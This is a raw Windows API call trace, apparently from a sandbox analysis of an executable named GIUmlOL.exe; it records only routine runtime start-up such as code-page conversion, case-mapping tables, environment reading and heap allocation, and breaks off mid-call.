\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0216.642] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0216.642] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0216.642] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0216.643] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0216.643] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0216.643] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0216.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0216.643] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0216.643] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0216.643] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0216.643] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0216.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0216.643] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0216.643] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1000) returned 0x447790 [0216.644] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0216.644] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0216.644] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0216.644] AreFileApisANSI () returned 1 [0216.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0216.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0216.644] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xcc) returned 0x434b40 [0216.645] GetEnvironmentStringsW () returned 0x4487a0* [0216.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0216.645] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x4e6) returned 0x449180 [0216.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x449180, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0216.645] FreeEnvironmentStringsW (penv=0x4487a0) returned 1 [0216.645] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x118) returned 0x439cb0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1f) returned 0x43b310 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x43e400 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x43e600 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x441170 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x43e700 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x4344c0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b160 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd) returned 0x4397c0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1d) returned 0x43b3d0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x43e4c0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x15) returned 0x433fb0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17) returned 0x43c750 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe) returned 0x433cb0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x69) returned 0x433eb0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3e) returned 0x440bd0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1d) returned 0x43b370 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x441440 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4325f0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x18) returned 0x435660 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1b) returned 0x43b0d0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b3a0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x29) returned 0x43e500 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b460 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x6b) returned 0x4388a0 [0216.646] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17) returned 0x435680 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xf) returned 0x434810 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x434830 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x43e280 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x29) returned 0x43e540 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x439480 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x21) returned 0x43b4c0 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x449a20 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x22) returned 0x43ae00 [0216.647] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x4497a0 [0216.647] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449180 | out: hHeap=0x430000) returned 1 [0216.648] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3a7) returned 0x449a80 [0216.650] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43ae30 [0216.650] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3a7) returned 0x453e30 [0216.652] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.652] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xfef7) returned 0x45e1e0 [0216.655] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x440a40 [0216.655] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xfef7) returned 0x46e0e0 [0216.657] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43ae30 | out: hHeap=0x430000) returned 1 [0216.657] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45e1e0 | out: hHeap=0x430000) returned 1 [0216.658] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x450) returned 0x4487a0 [0216.658] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x450) returned 0x448c00 [0216.658] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.658] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1ea7) returned 0x47dfe0 [0216.659] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xf40) returned 0x449a80 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x7a0) returned 0x44a9d0 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xbf0) returned 0x449a80 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448c00 | out: hHeap=0x430000) returned 1 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44a9d0 | out: hHeap=0x430000) returned 1 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x640) returned 0x4487a0 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1247) returned 0x47dfe0 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x520) returned 0x47f230 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1b56) returned 0x449a80 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.660] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f230 | out: hHeap=0x430000) returned 1 [0216.660] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8a0) returned 0x4487a0 [0216.661] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x28ed) returned 0x44b5e0 [0216.661] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.661] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.661] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x550) returned 0x4487a0 [0216.661] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.661] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2537) returned 0x44dee0 [0216.662] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x12b7) returned 0x449a80 [0216.662] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x950) returned 0x4487a0 [0216.662] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44dee0 | out: hHeap=0x430000) returned 1 [0216.662] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.662] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x3d4f) returned 0x44dee0 [0216.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44b5e0 | out: hHeap=0x430000) returned 1 [0216.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2377) returned 0x449a80 [0216.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x11d7) returned 0x47dfe0 [0216.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8e0) returned 0x47f1c0 [0216.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449a80 | out: hHeap=0x430000) returned 1 [0216.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f1c0 | out: hHeap=0x430000) returned 1 [0216.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5b0) returned 0x4487a0 [0216.663] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.663] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x640) returned 0x4487a0 [0216.664] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5be2) returned 0x45e1e0 [0216.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44dee0 | out: hHeap=0x430000) returned 1 [0216.664] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.664] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x890) returned 0x4487a0 [0216.665] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xac0) returned 0x4487a0 [0216.665] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43ae30 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x960) returned 0x4487a0 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x960) returned 0x47dfe0 [0216.665] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x460) returned 0x4487a0 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe0f) returned 0x47e950 [0216.665] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dfe0 | out: hHeap=0x430000) returned 1 [0216.665] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1c17) returned 0x463dd0 [0216.665] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe00) returned 0x4487a0 [0216.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x700) returned 0x47f770 [0216.666] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463dd0 | out: hHeap=0x430000) returned 1 [0216.666] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4487a0 | out: hHeap=0x430000) returned 1 [0216.666] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x153d) returned 0x463dd0 [0216.666] HeapFree (in: hHeap=0x430000, dwFlags=0x0, 